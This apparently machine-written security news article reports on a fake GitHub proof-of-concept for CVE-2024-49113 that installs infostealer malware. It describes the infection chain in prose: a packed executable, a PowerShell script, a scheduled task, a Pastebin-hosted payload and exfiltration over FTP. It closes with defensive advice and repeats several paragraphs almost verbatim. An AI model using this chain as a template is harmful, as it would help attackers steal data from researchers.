Ethical Hacking News
A malicious exploit on GitHub is spreading infostealer malware that exfiltrates sensitive data to an external FTP server. This tactic has been seen in various documented cases, highlighting the persistence of this threat among malicious actors. To protect yourself, it's crucial to only trust reputable sources and review code before executing it on your system.
Malicious actors have exploited CVE-2024-49113, a Windows LDAP vulnerability, for infostealer malware. The exploit was disguised as a proof-of-concept (PoC) project on GitHub and has been spreading sensitive data to an external FTP server. This tactic is not new and has been seen in various documented cases of malicious tools being masqueraded as legitimate PoC's on GitHub. Validating repository authenticity, reviewing code before execution, and using VirusTotal for binary analysis are crucial steps to prevent such attacks.
Malicious actors have been exploiting the CVE-2024-49113, a vulnerability in Windows Lightweight Directory Access Protocol (LDAP), for malicious purposes. The exploit, disguised as a proof-of-concept (PoC) project on GitHub, has been spreading infostealer malware that exfiltrates sensitive data to an external FTP server.
The tactic employed by the threat actors is not new and has been seen in various documented cases of malicious tools being masqueraded as legitimate PoC's on GitHub. The most recent incident was discovered by Trend Micro, which highlights the persistence of this tactic among malicious actors.
According to Trend Micro, the malicious repository on GitHub appears to have been forked from SafeBreach Labs' legitimate PoC for CVE-2024-49113, published on January 1, 2025. The malicious project contains a UPX-packed executable 'poc.exe' that, upon execution, drops a PowerShell script in the victim's %Temp% folder.
The script then creates a scheduled job on the compromised system, which executes an encoded script that fetches a third script from Pastebin. This final payload collects computer information, process lists, directory lists, IP address, and network adapter information, as well as installed updates, and uploads them in ZIP archive form to an external FTP server using hardcoded credentials.
The theft of sensitive data is a stark reminder for users to exercise caution when sourcing public exploits for research or testing. It is crucial to only trust cybersecurity firms and researchers with a good reputation and to review code before executing it on the system. Additionally, uploading binaries to VirusTotal can help prevent such malicious attacks.
Furthermore, threat actors have attempted to impersonate well-known security researchers in the past, so validating repository authenticity is also essential. The recent incident highlights the importance of vigilance in protecting against malicious PoC's and encourages users to take proactive steps to safeguard themselves against such threats.
Moreover, it has been reported that this tactic is not new and has been seen in various documented cases of malicious tools being masqueraded as legitimate PoC's on GitHub. However, the persistence of this tactic among malicious actors serves as a reminder for users to remain vigilant and take necessary precautions to protect themselves against such threats.
In conclusion, the recent incident highlights the importance of vigilance in protecting against malicious PoC's and encourages users to take proactive steps to safeguard themselves against such threats.
Related Information:
https://www.bleepingcomputer.com/news/security/fake-ldapnightmware-exploit-on-github-spreads-infostealer-malware/
https://nvd.nist.gov/vuln/detail/CVE-2024-49113
https://www.cvedetails.com/cve/CVE-2024-49113/
Published: Sat Jan 11 10:51:44 2025 by llama3.2 3B Q4_K_M
